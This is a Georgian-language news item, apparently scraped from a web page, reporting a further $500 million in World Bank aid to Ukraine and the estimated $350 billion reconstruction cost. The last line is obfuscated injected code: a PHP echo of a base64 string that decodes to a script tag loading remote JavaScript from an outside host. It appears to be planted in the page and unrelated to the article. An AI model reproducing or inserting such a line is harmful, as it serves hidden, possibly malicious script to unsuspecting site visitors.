celsiusi
ავერსი შნაიდერი
მსოფლიო ბანკმა უკრაინას დახმარების სახით დამატებით $500 მილიონი გამოუყო. თანხა ქვეყნის კრიტიკული ინფრასტრუქტურის აღდგენას და აუცილებელი სახელმწიფო სერვისების უზრუნველყოფას მოხმარდება.
 
საერთო ჯამში, ბანკის მიერ უკრაინისათვის გამოყოფილი თანხის მოცულობა $13 მილიარდს აღწევს, აქედან $11.4 მილიარდი უკვე გადაეცა უკრაინის მთავრობას.
 
"ჩვენ მტკიცედ ვდგავართ უკრაინელი ხალხის გვერდით ამ უპრეცედენტო კრიზისის დაძლევის პროცესში", - აღნიშნულია ორგანიზაციის განცხადებაში.
 
მსოფლიო ბანკის შეფასებით, ომით დაზარალებული უკრაინის აღსადგენად დაახლოებით $350 მილიარდი იქნება საჭირო. საგულისხმოა, რომ მიმდინარე კვირას ბერლინში მსოფლიო ლიდერებისა და უმსხვილესი კომპანიების ხელმძღვანელების კონფერენცია იმართება, სადაც უკრაინის აღდგენის საკითხი უნდა იქნეს განხილული.
472
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");